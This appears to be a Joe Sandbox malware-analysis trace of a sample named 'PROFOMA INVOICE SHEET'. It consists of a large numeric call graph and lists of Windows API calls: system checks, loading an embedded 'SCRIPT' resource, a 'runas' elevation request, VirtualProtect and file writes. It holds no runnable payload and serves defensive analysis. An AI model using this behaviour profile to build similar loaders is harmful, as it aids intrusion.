95975->95930 95976->95949 95977->95951 95982 33d1f6 95978->95982 95981 322cbd 8 API calls 3 library calls 95981->95952 95985 33d213 95982->95985 95986 33d20f 95982->95986 95984 31fed8 95984->95955 95984->95981 95985->95986 95988 334bfb 95985->95988 96000 320a8c 95986->96000 95989 334c07 CallCatchBlock 95988->95989 96007 332f5e EnterCriticalSection 95989->96007 95991 334c0e 96008 3350af 95991->96008 95993 334c1d 95994 334c2c 95993->95994 96021 334a8f 29 API calls 95993->96021 96023 334c48 LeaveCriticalSection _abort 95994->96023 95997 334c27 96022 334b45 GetStdHandle GetFileType 95997->96022 95998 334c3d __fread_nolock 95998->95985 96001 320a97 IsProcessorFeaturePresent 96000->96001 96002 320a95 96000->96002 96004 320c5d 96001->96004 96002->95984 96036 320c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96004->96036 96006 320d40 96006->95984 96007->95991 96009 3350bb CallCatchBlock 96008->96009 96010 3350c8 96009->96010 96011 3350df 96009->96011 96032 32f2d9 20 API calls _abort 96010->96032 96024 332f5e EnterCriticalSection 96011->96024 96014 3350cd 96033 3327ec 26 API calls _abort 96014->96033 96016 3350d7 __fread_nolock 96016->95993 96017 335117 96034 33513e LeaveCriticalSection _abort 96017->96034 96018 3350eb 96018->96017 96025 335000 96018->96025 96021->95997 96022->95994 96023->95998 96024->96018 96026 334c7d _abort 20 API calls 96025->96026 96031 335012 96026->96031 96027 33501f 96028 3329c8 _free 20 API calls 96027->96028 96030 335071 96028->96030 96030->96018 96031->96027 96035 333405 11 API calls 2 library calls 96031->96035 96032->96014 96033->96016 96034->96016 96035->96031 96036->96006 96038 32096c GetStartupInfoW 96037->96038 96038->95968 96039 30105b 96044 30344d 96039->96044 96041 30106a 96075 3200a3 29 API calls __onexit 96041->96075 96043 301074 96045 30345d __wsopen_s 96044->96045 96046 30a961 22 API calls 96045->96046 96047 303513 96046->96047 96048 303a5a 24 API calls 96047->96048 96049 30351c 
96048->96049 96076 303357 96049->96076 96052 3033c6 22 API calls 96053 303535 96052->96053 96054 30515f 22 API calls 96053->96054 96055 303544 96054->96055 96056 30a961 22 API calls 96055->96056 96057 30354d 96056->96057 96058 30a6c3 22 API calls 96057->96058 96059 303556 RegOpenKeyExW 96058->96059 96060 343176 RegQueryValueExW 96059->96060 96064 303578 96059->96064 96061 343193 96060->96061 96062 34320c RegCloseKey 96060->96062 96063 31fe0b 22 API calls 96061->96063 96062->96064 96074 34321e _wcslen 96062->96074 96065 3431ac 96063->96065 96064->96041 96066 305722 22 API calls 96065->96066 96067 3431b7 RegQueryValueExW 96066->96067 96069 3431d4 96067->96069 96071 3431ee ISource 96067->96071 96068 304c6d 22 API calls 96068->96074 96070 306b57 22 API calls 96069->96070 96070->96071 96071->96062 96072 309cb3 22 API calls 96072->96074 96073 30515f 22 API calls 96073->96074 96074->96064 96074->96068 96074->96072 96074->96073 96075->96043 96077 341f50 __wsopen_s 96076->96077 96078 303364 GetFullPathNameW 96077->96078 96079 303386 96078->96079 96080 306b57 22 API calls 96079->96080 96081 3033a4 96080->96081 96081->96052 96082 30f7bf 96083 30f7d3 96082->96083 96084 30fcb6 96082->96084 96086 30fcc2 96083->96086 96087 31fddb 22 API calls 96083->96087 96175 30aceb 23 API calls ISource 96084->96175 96176 30aceb 23 API calls ISource 96086->96176 96089 30f7e5 96087->96089 96089->96086 96090 30fd3d 96089->96090 96091 30f83e 96089->96091 96177 371155 22 API calls 96090->96177 96116 30ed9d ISource 96091->96116 96117 311310 96091->96117 96094 31fddb 22 API calls 96114 30ec76 ISource 96094->96114 96095 30fef7 96103 30a8c7 22 API calls 96095->96103 96095->96116 96098 354b0b 96179 37359c 82 API calls __wsopen_s 96098->96179 96099 30a8c7 22 API calls 96099->96114 96100 354600 96105 30a8c7 22 API calls 96100->96105 96100->96116 96103->96116 96105->96116 96106 30fbe3 96108 354bdc 96106->96108 96115 30f3ae ISource 96106->96115 96106->96116 96107 30a961 22 API calls 96107->96114 96180 
37359c 82 API calls __wsopen_s 96108->96180 96109 3200a3 29 API calls pre_c_initialization 96109->96114 96110 320242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96110->96114 96112 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96112->96114 96113 354beb 96181 37359c 82 API calls __wsopen_s 96113->96181 96114->96094 96114->96095 96114->96098 96114->96099 96114->96100 96114->96106 96114->96107 96114->96109 96114->96110 96114->96112 96114->96113 96114->96115 96114->96116 96173 3101e0 207 API calls 2 library calls 96114->96173 96174 3106a0 41 API calls ISource 96114->96174 96115->96116 96178 37359c 82 API calls __wsopen_s 96115->96178 96118 3117b0 96117->96118 96119 311376 96117->96119 96295 320242 5 API calls __Init_thread_wait 96118->96295 96121 311390 96119->96121 96122 356331 96119->96122 96182 311940 96121->96182 96300 38709c 207 API calls 96122->96300 96124 3117ba 96127 3117fb 96124->96127 96130 309cb3 22 API calls 96124->96130 96126 35633d 96126->96114 96132 356346 96127->96132 96134 31182c 96127->96134 96129 311940 9 API calls 96131 3113b6 96129->96131 96138 3117d4 96130->96138 96131->96127 96133 3113ec 96131->96133 96301 37359c 82 API calls __wsopen_s 96132->96301 96133->96132 96139 311408 __fread_nolock 96133->96139 96297 30aceb 23 API calls ISource 96134->96297 96137 311839 96298 31d217 207 API calls 96137->96298 96296 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96138->96296 96139->96137 96142 35636e 96139->96142 96149 31fddb 22 API calls 96139->96149 96150 31fe0b 22 API calls 96139->96150 96156 30ec40 207 API calls 96139->96156 96157 31152f 96139->96157 96158 3563b2 96139->96158 96161 356369 96139->96161 96302 37359c 82 API calls __wsopen_s 96142->96302 96143 311872 96299 31faeb 23 API calls 96143->96299 96145 3563d1 96304 385745 54 API calls _wcslen 96145->96304 96146 31153c 96148 311940 9 API calls 96146->96148 96151 311549 
96148->96151 96149->96139 96150->96139 96152 311940 9 API calls 96151->96152 96153 3564fa 96151->96153 96159 311563 96152->96159 96153->96161 96305 37359c 82 API calls __wsopen_s 96153->96305 96156->96139 96157->96145 96157->96146 96303 37359c 82 API calls __wsopen_s 96158->96303 96159->96153 96162 30a8c7 22 API calls 96159->96162 96164 3115c7 ISource 96159->96164 96161->96114 96162->96164 96163 311940 9 API calls 96163->96164 96164->96143 96164->96153 96164->96161 96164->96163 96167 31167b ISource 96164->96167 96192 306246 96164->96192 96196 38958b 96164->96196 96199 37744a 96164->96199 96255 38e204 96164->96255 96291 3783da 96164->96291 96165 31171d 96165->96114 96167->96165 96294 31ce17 22 API calls ISource 96167->96294 96173->96114 96174->96114 96175->96086 96176->96090 96177->96116 96178->96116 96179->96116 96180->96113 96181->96116 96183 311981 96182->96183 96184 31195d 96182->96184 96306 320242 5 API calls __Init_thread_wait 96183->96306 96191 3113a0 96184->96191 96308 320242 5 API calls __Init_thread_wait 96184->96308 96186 31198b 96186->96184 96307 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96186->96307 96188 318727 96188->96191 96309 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96188->96309 96191->96129 96193 306250 96192->96193 96194 30625f 96192->96194 96193->96164 96194->96193 96195 306264 CloseHandle 96194->96195 96195->96193 96310 387f59 96196->96310 96198 38959b 96198->96164 96200 377474 96199->96200 96201 377469 96199->96201 96205 30a961 22 API calls 96200->96205 96231 377554 96200->96231 96438 30b567 39 API calls 96201->96438 96203 31fddb 22 API calls 96204 377587 96203->96204 96206 31fe0b 22 API calls 96204->96206 96207 377495 96205->96207 96208 377598 96206->96208 96209 30a961 22 API calls 96207->96209 96210 306246 CloseHandle 96208->96210 96211 37749e 96209->96211 96213 3775a3 96210->96213 96212 307510 53 API calls 96211->96212 96214 3774aa 96212->96214 96215 30a961 22 API calls 96213->96215 
96439 30525f 22 API calls 96214->96439 96217 3775ab 96215->96217 96219 306246 CloseHandle 96217->96219 96218 3774bf 96220 306350 22 API calls 96218->96220 96221 3775b2 96219->96221 96222 3774f2 96220->96222 96223 307510 53 API calls 96221->96223 96224 37754a 96222->96224 96440 36d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96222->96440 96225 3775be 96223->96225 96442 30b567 39 API calls 96224->96442 96227 306246 CloseHandle 96225->96227 96230 3775c8 96227->96230 96229 377502 96229->96224 96232 377506 96229->96232 96430 305745 96230->96430 96231->96203 96253 3776a4 96231->96253 96234 309cb3 22 API calls 96232->96234 96236 377513 96234->96236 96441 36d2c1 26 API calls 96236->96441 96237 3776de GetLastError 96240 3776f7 96237->96240 96239 3775ea 96443 3053de 27 API calls ISource 96239->96443 96450 306216 CloseHandle ISource 96240->96450 96243 3775f8 96444 3053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96243->96444 96244 37751c 96244->96224 96246 377645 96247 31fddb 22 API calls 96246->96247 96249 377679 96247->96249 96248 3775ff 96248->96246 96445 36ccff 96248->96445 96251 30a961 22 API calls 96249->96251 96252 377686 96251->96252 96252->96253 96449 36417d 22 API calls __fread_nolock 96252->96449 96253->96164 96256 30a961 22 API calls 96255->96256 96257 38e21b 96256->96257 96258 307510 53 API calls 96257->96258 96259 38e22a 96258->96259 96260 306270 22 API calls 96259->96260 96261 38e23d 96260->96261 96262 307510 53 API calls 96261->96262 96263 38e24a 96262->96263 96264 38e262 96263->96264 96265 38e2c7 96263->96265 96472 30b567 39 API calls 96264->96472 96267 307510 53 API calls 96265->96267 96268 38e2cc 96267->96268 96269 38e2d9 96268->96269 96270 38e314 96268->96270 96475 309c6e 22 API calls 96269->96475 96274 38e32c 96270->96274 96476 30b567 39 API calls 96270->96476 96271 38e267 96271->96269 96273 38e280 96271->96273 96473 306d25 22 API calls __fread_nolock 96273->96473 96277 38e345 96274->96277 96477 30b567 39 API calls 96274->96477 96278 
30a8c7 22 API calls 96277->96278 96281 38e35f 96278->96281 96279 38e28d 96282 306350 22 API calls 96279->96282 96453 3692c8 96281->96453 96284 38e29b 96282->96284 96474 306d25 22 API calls __fread_nolock 96284->96474 96286 38e2b4 96287 306350 22 API calls 96286->96287 96290 38e2c2 96287->96290 96288 38e2e6 96288->96164 96478 3062b5 22 API calls 96290->96478 96482 3798e3 96291->96482 96293 3783ea 96293->96164 96294->96167 96295->96124 96296->96127 96297->96137 96298->96143 96299->96143 96300->96126 96301->96161 96302->96161 96303->96161 96304->96159 96305->96161 96306->96186 96307->96184 96308->96188 96309->96191 96348 307510 96310->96348 96314 38844f 96412 388ee4 60 API calls 96314->96412 96317 388049 96319 307510 53 API calls 96317->96319 96327 387fd5 ISource 96317->96327 96335 388281 96317->96335 96403 36417d 22 API calls __fread_nolock 96317->96403 96404 38851d 42 API calls _strftime 96317->96404 96318 38845e 96320 38846a 96318->96320 96321 38828f 96318->96321 96319->96317 96320->96327 96384 387e86 96321->96384 96326 3882c8 96399 31fc70 96326->96399 96327->96198 96330 3882e8 96405 37359c 82 API calls __wsopen_s 96330->96405 96331 388302 96406 3063eb 22 API calls 96331->96406 96334 3882f3 GetCurrentProcess TerminateProcess 96334->96331 96335->96314 96335->96321 96336 388311 96407 306a50 22 API calls 96336->96407 96338 38832a 96347 388352 96338->96347 96408 3104f0 22 API calls 96338->96408 96339 3884c5 96339->96327 96344 3884d9 FreeLibrary 96339->96344 96341 388341 96409 388b7b 75 API calls 96341->96409 96344->96327 96347->96339 96410 3104f0 22 API calls 96347->96410 96411 30aceb 23 API calls ISource 96347->96411 96413 388b7b 75 API calls 96347->96413 96349 307525 96348->96349 96365 307522 96348->96365 96350 30755b 96349->96350 96351 30752d 96349->96351 96353 30756d 96350->96353 96360 3450f6 96350->96360 96362 34500f 96350->96362 96414 3251c6 26 API calls 96351->96414 96415 31fb21 51 API calls 96353->96415 96356 30753d 96359 31fddb 22 API calls 96356->96359 96357 
34510e 96357->96357 96361 307547 96359->96361 96417 325183 26 API calls 96360->96417 96363 309cb3 22 API calls 96361->96363 96364 31fe0b 22 API calls 96362->96364 96370 345088 96362->96370 96363->96365 96366 345058 96364->96366 96365->96327 96371 388cd3 96365->96371 96367 31fddb 22 API calls 96366->96367 96368 34507f 96367->96368 96369 309cb3 22 API calls 96368->96369 96369->96370 96416 31fb21 51 API calls 96370->96416 96372 30aec9 22 API calls 96371->96372 96373 388cee CharLowerBuffW 96372->96373 96418 368e54 96373->96418 96377 30a961 22 API calls 96378 388d2a 96377->96378 96425 306d25 22 API calls __fread_nolock 96378->96425 96380 388d3e 96381 3093b2 22 API calls 96380->96381 96383 388d48 _wcslen 96381->96383 96382 388e5e _wcslen 96382->96317 96383->96382 96426 38851d 42 API calls _strftime 96383->96426 96385 387ea1 96384->96385 96386 387eec 96384->96386 96387 31fe0b 22 API calls 96385->96387 96390 389096 96386->96390 96388 387ec3 96387->96388 96388->96386 96389 31fddb 22 API calls 96388->96389 96389->96388 96391 3892ab ISource 96390->96391 96396 3890ba _strcat _wcslen 96390->96396 96391->96326 96392 30b38f 39 API calls 96392->96396 96393 30b567 39 API calls 96393->96396 96394 30b6b5 39 API calls 96394->96396 96395 307510 53 API calls 96395->96396 96396->96391 96396->96392 96396->96393 96396->96394 96396->96395 96397 32ea0c 21 API calls ___std_exception_copy 96396->96397 96429 36efae 24 API calls _wcslen 96396->96429 96397->96396 96401 31fc85 96399->96401 96400 31fd1d VirtualProtect 96402 31fceb 96400->96402 96401->96400 96401->96402 96402->96330 96402->96331 96403->96317 96404->96317 96405->96334 96406->96336 96407->96338 96408->96341 96409->96347 96410->96347 96411->96347 96412->96318 96413->96347 96414->96356 96415->96356 96416->96360 96417->96357 96419 368e74 _wcslen 96418->96419 96420 368f63 96419->96420 96422 368f68 96419->96422 96424 368ea9 96419->96424 96420->96377 96420->96383 96422->96420 96428 31ce60 41 API calls 96422->96428 96424->96420 96427 31ce60 
41 API calls 96424->96427 96425->96380 96426->96382 96427->96424 96428->96422 96429->96396 96431 344035 96430->96431 96432 30575c CreateFileW 96430->96432 96433 30577b 96431->96433 96434 34403b CreateFileW 96431->96434 96432->96433 96433->96237 96433->96239 96434->96433 96435 344063 96434->96435 96451 3054c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96435->96451 96437 34406e 96437->96433 96438->96200 96439->96218 96440->96229 96441->96244 96442->96231 96443->96243 96444->96248 96446 36cd0e 96445->96446 96447 36cd19 WriteFile 96445->96447 96452 36cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96446->96452 96447->96246 96449->96253 96450->96253 96451->96437 96452->96447 96454 30a961 22 API calls 96453->96454 96455 3692de 96454->96455 96456 306270 22 API calls 96455->96456 96457 3692f2 96456->96457 96458 368e54 41 API calls 96457->96458 96464 369314 96457->96464 96459 36930e 96458->96459 96459->96464 96479 306d25 22 API calls __fread_nolock 96459->96479 96460 368e54 41 API calls 96460->96464 96463 3693b3 96466 30a8c7 22 API calls 96463->96466 96467 3693c2 96463->96467 96464->96460 96464->96463 96465 306350 22 API calls 96464->96465 96468 369397 96464->96468 96480 306d25 22 API calls __fread_nolock 96464->96480 96465->96464 96466->96467 96467->96290 96481 306d25 22 API calls __fread_nolock 96468->96481 96470 3693a7 96471 306350 22 API calls 96470->96471 96471->96463 96472->96271 96473->96279 96474->96286 96475->96288 96476->96274 96477->96277 96478->96288 96479->96464 96480->96464 96481->96470 96483 379902 96482->96483 96484 3799e8 96482->96484 96486 31fddb 22 API calls 96483->96486 96540 379caa 39 API calls 96484->96540 96487 379909 96486->96487 96489 31fe0b 22 API calls 96487->96489 96488 3799ca 96488->96293 96490 37991a 96489->96490 96492 306246 CloseHandle 96490->96492 96491 379ac5 96533 371e96 96491->96533 96494 379925 96492->96494 96497 30a961 22 API calls 96494->96497 96495 379acc 96503 36ccff 4 API calls 96495->96503 96496 3799a2 96496->96488 
96496->96491 96499 379a33 96496->96499 96498 37992d 96497->96498 96500 306246 CloseHandle 96498->96500 96501 307510 53 API calls 96499->96501 96502 379934 96500->96502 96511 379a3a 96501->96511 96504 307510 53 API calls 96502->96504 96508 379aa8 96503->96508 96507 379940 96504->96507 96505 379abb 96542 36cd57 30 API calls 96505->96542 96509 306246 CloseHandle 96507->96509 96508->96488 96512 306246 CloseHandle 96508->96512 96513 37994a 96509->96513 96510 306270 22 API calls 96514 379a7e 96510->96514 96511->96505 96525 379a6e 96511->96525 96515 379b1e 96512->96515 96516 305745 5 API calls 96513->96516 96517 379a8e 96514->96517 96520 30a8c7 22 API calls 96514->96520 96543 306216 CloseHandle ISource 96515->96543 96519 379959 96516->96519 96521 3033c6 22 API calls 96517->96521 96522 3799c2 96519->96522 96523 37995d 96519->96523 96520->96517 96524 379a9c 96521->96524 96539 306216 CloseHandle ISource 96522->96539 96537 3053de 27 API calls ISource 96523->96537 96541 36cd57 30 API calls 96524->96541 96525->96510 96529 37996b 96538 3053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96529->96538 96531 379972 96531->96496 96532 36ccff 4 API calls 96531->96532 96532->96496 96534 371ea4 96533->96534 96535 371e9f 96533->96535 96534->96495 96544 370f67 24 API calls __fread_nolock 96535->96544 96537->96529 96538->96531 96539->96488 96540->96496 96541->96508 96542->96508 96543->96488 96544->96534 96545 30ddc0 96548 30aa19 96545->96548 96547 30ddcc 96549 30aa3a 96548->96549 96550 30aa8f 96548->96550 96549->96550 96551 30ec40 207 API calls 96549->96551 96555 30aabe 96550->96555 96558 37359c 82 API calls __wsopen_s 96550->96558 96553 30aa6b 96551->96553 96553->96555 96557 30aceb 23 API calls ISource 96553->96557 96554 34f907 96554->96554 96555->96547 96557->96550 96558->96554 96559 338402 96564 3381be 96559->96564 96562 33842a 96569 3381ef try_get_first_available_module 96564->96569 96566 3383ee 96583 3327ec 26 API calls _abort 96566->96583 96568 338343 96568->96562 96576 340984 
96568->96576 96572 338338 96569->96572 96579 328e0b 40 API calls 2 library calls 96569->96579 96571 33838c 96571->96572 96580 328e0b 40 API calls 2 library calls 96571->96580 96572->96568 96582 32f2d9 20 API calls _abort 96572->96582 96574 3383ab 96574->96572 96581 328e0b 40 API calls 2 library calls 96574->96581 96584 340081 96576->96584 96578 34099f 96578->96562 96579->96571 96580->96574 96581->96572 96582->96566 96583->96568 96587 34008d CallCatchBlock 96584->96587 96585 34009b 96641 32f2d9 20 API calls _abort 96585->96641 96587->96585 96588 3400d4 96587->96588 96595 34065b 96588->96595 96589 3400a0 96642 3327ec 26 API calls _abort 96589->96642 96594 3400aa __fread_nolock 96594->96578 96596 340678 96595->96596 96597 3406a6 96596->96597 96598 34068d 96596->96598 96644 335221 96597->96644 96658 32f2c6 20 API calls _abort 96598->96658 96601 3406ab 96602 3406b4 96601->96602 96603 3406cb 96601->96603 96660 32f2c6 20 API calls _abort 96602->96660 96657 34039a CreateFileW 96603->96657 96604 340692 96659 32f2d9 20 API calls _abort 96604->96659 96608 3406b9 96661 32f2d9 20 API calls _abort 96608->96661 96609 3400f8 96643 340121 LeaveCriticalSection __wsopen_s 96609->96643 96611 340781 GetFileType 96612 3407d3 96611->96612 96613 34078c GetLastError 96611->96613 96666 33516a 21 API calls 3 library calls 96612->96666 96664 32f2a3 20 API calls 2 library calls 96613->96664 96614 340756 GetLastError 96663 32f2a3 20 API calls 2 library calls 96614->96663 96616 340704 96616->96611 96616->96614 96662 34039a CreateFileW 96616->96662 96618 34079a CloseHandle 96618->96604 96620 3407c3 96618->96620 96665 32f2d9 20 API calls _abort 96620->96665 96622 340749 96622->96611 96622->96614 96624 3407f4 96626 340840 96624->96626 96667 3405ab 72 API calls 4 library calls 96624->96667 96625 3407c8 96625->96604 96630 34086d 96626->96630 96668 34014d 72 API calls 4 library calls 96626->96668 96629 340866 96629->96630 96631 34087e 96629->96631 96632 3386ae __wsopen_s 29 API calls 96630->96632 
96631->96609 96633 3408fc CloseHandle 96631->96633 96632->96609 96669 34039a CreateFileW 96633->96669 96635 340927 96636 340931 GetLastError 96635->96636 96637 34095d 96635->96637 96670 32f2a3 20 API calls 2 library calls 96636->96670 96637->96609 96639 34093d 96671 335333 21 API calls 3 library calls 96639->96671 96641->96589 96642->96594 96643->96594 96645 33522d CallCatchBlock 96644->96645 96672 332f5e EnterCriticalSection 96645->96672 96647 335234 96649 335259 96647->96649 96652 3352c7 EnterCriticalSection 96647->96652 96654 33527b 96647->96654 96651 335000 __wsopen_s 21 API calls 96649->96651 96650 3352a4 __fread_nolock 96650->96601 96653 33525e 96651->96653 96652->96654 96655 3352d4 LeaveCriticalSection 96652->96655 96653->96654 96676 335147 EnterCriticalSection 96653->96676 96673 33532a 96654->96673 96655->96647 96657->96616 96658->96604 96659->96609 96660->96608 96661->96604 96662->96622 96663->96604 96664->96618 96665->96625 96666->96624 96667->96626 96668->96629 96669->96635 96670->96639 96671->96637 96672->96647 96677 332fa6 LeaveCriticalSection 96673->96677 96675 335331 96675->96650 96676->96654 96677->96675 96678 342ba5 96679 302b25 96678->96679 96680 342baf 96678->96680 96706 302b83 7 API calls 96679->96706 96681 303a5a 24 API calls 96680->96681 96684 342bb8 96681->96684 96686 309cb3 22 API calls 96684->96686 96688 342bc6 96686->96688 96687 302b2f 96693 303837 49 API calls 96687->96693 96694 302b44 96687->96694 96689 342bf5 96688->96689 96690 342bce 96688->96690 96692 3033c6 22 API calls 96689->96692 96691 3033c6 22 API calls 96690->96691 96695 342bd9 96691->96695 96696 342bf1 GetForegroundWindow ShellExecuteW 96692->96696 96693->96694 96697 302b5f 96694->96697 96710 3030f2 Shell_NotifyIconW ___scrt_fastfail 96694->96710 96698 306350 22 API calls 96695->96698 96700 342c26 96696->96700 96703 302b66 SetCurrentDirectoryW 96697->96703 96702 342be7 96698->96702 96700->96697 96704 3033c6 22 API calls 96702->96704 96705 302b7a 96703->96705 96704->96696 96711 

                                    Control-flow Graph
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0030430D
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • GetCurrentProcess.KERNEL32(?,0039CB64,00000000,?,?), ref: 00304422
                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00304429
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00304454
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00304466
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00304474
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0030447B
                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 003044A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                    • API String ID: 3290436268-3101561225
                                    • Opcode ID: 20dab3c4e4a7592bb4b1d5febc87d0461299af23feb330dc254b865c5905fc98
                                    • Instruction ID: 9f79fccb25e1cd2ca05e861d8f17e7152ab6706b9e6b5dad83ea34139019f6ed
                                    • Opcode Fuzzy Hash: 20dab3c4e4a7592bb4b1d5febc87d0461299af23feb330dc254b865c5905fc98
                                    • Instruction Fuzzy Hash: 05A186ADA1B2C0FFC713C76EBC811957FEDBB26340F19549BE18197A62D2345A04CB25

                                    Control-flow Graph
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003050AA,?,?,00000000,00000000), ref: 003042B2
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003050AA,?,?,00000000,00000000), ref: 003042C9
                                    • LoadResource.KERNEL32(?,00000000,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20), ref: 003435BE
                                    • SizeofResource.KERNEL32(?,00000000,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20), ref: 003435D3
                                    • LockResource.KERNEL32(003050AA,?,?,003050AA,?,?,00000000,00000000,?,?,?,?,?,?,00304F20,?), ref: 003435E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 69c8dd67e94da93d2d47366b2d9051d0f144f09930bb37fc0239947bd5b00d35
                                    • Instruction ID: 7cc1b8ea17f35450bbc447ed3a65394a4b5347e1b95b6d77c7b3d8d96cadeee7
                                    • Opcode Fuzzy Hash: 69c8dd67e94da93d2d47366b2d9051d0f144f09930bb37fc0239947bd5b00d35
                                    • Instruction Fuzzy Hash: 54117CB0201701BFDB228B65DC48F677BBDEBC5B51F10496AF502D6290DB72E900C630

                                    Control-flow Graph

                                    APIs
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00302B6B
                                      • Part of subcall function 00303A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D1418,?,00302E7F,?,?,?,00000000), ref: 00303A78
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,003C2224), ref: 00342C10
                                    • ShellExecuteW.SHELL32(00000000,?,?,003C2224), ref: 00342C17
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                    • String ID: runas
                                    • API String ID: 448630720-4000483414
                                    • Opcode ID: 5c8674f47c48dd93cf52e68fe348f6b696f292985c3caeea7604ee1df0550e67
                                    • Instruction ID: 5d97d0728f9cbbcef2945227e851e4958a23b9f10ed2bdca779e02bf4e96d41d
                                    • Opcode Fuzzy Hash: 5c8674f47c48dd93cf52e68fe348f6b696f292985c3caeea7604ee1df0550e67
                                    • Instruction Fuzzy Hash: C111AF3120A2416BC717FF60E8B6ABF77A89B91740F44546EF1825A1E3CF219A498752
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: p#=
                                    • API String ID: 3964851224-1299286578
                                    • Opcode ID: a0382b131301f6ed51e6b08e6206eae89bfeb20170c336fb849e9212fc673d38
                                    • Instruction ID: 7b3e78d209a57b95f6eeeddfb51d1eb92b7b53aff06718ef2d9c1ac4049db8e2
                                    • Opcode Fuzzy Hash: a0382b131301f6ed51e6b08e6206eae89bfeb20170c336fb849e9212fc673d38
                                    • Instruction Fuzzy Hash: 1DA28B70619341CFC726CF18C490B6AB7E5BF89304F15996DE88A8B3A2D771EC45CB92
                                    APIs
                                    • GetInputState.USER32 ref: 0030D807
                                    • timeGetTime.WINMM ref: 0030DA07
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030DB28
